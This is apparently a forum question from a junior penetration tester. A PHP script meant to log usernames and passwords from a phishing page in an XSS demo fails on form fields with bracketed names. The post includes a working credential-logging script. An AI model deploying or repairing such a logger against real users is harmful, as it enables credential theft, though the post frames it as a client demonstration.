I’m a (junior) pen tester and I’m trying to make a script to demonstrate the dangers of an XSS attack to a client. I’ve got a php script that is meant to log user:pass combos when victims (i.e. myself in the demo) are redirected to a malicious page I’m hosting.

This is the part of the source for the login:

<input  type="text" id="form_login_username" name="form[login][username]" value=""       class="large" />
<input  type="password" id="form_login_password" name="form[login][password]" value="" class="large" />

I’m new to php so it might be something really basic that’s cause the problem. Here is my php script to log the details:

<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"]; 
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);

With this script I get:

 Notice: Undefined index: form[login][username] in...

And the same for the password.

I added in isset to see if the variables are even being set, and they’re not.

I know the script does work, as I tried it with a few other simple login pages and it’s worked perfectly. The only difference is that the username and password post variables in this case have square brackets in them – could this be the issue? I have tried url encoding them but to no avail 🙁

Any ideas where I’m going wrong? Thank you =)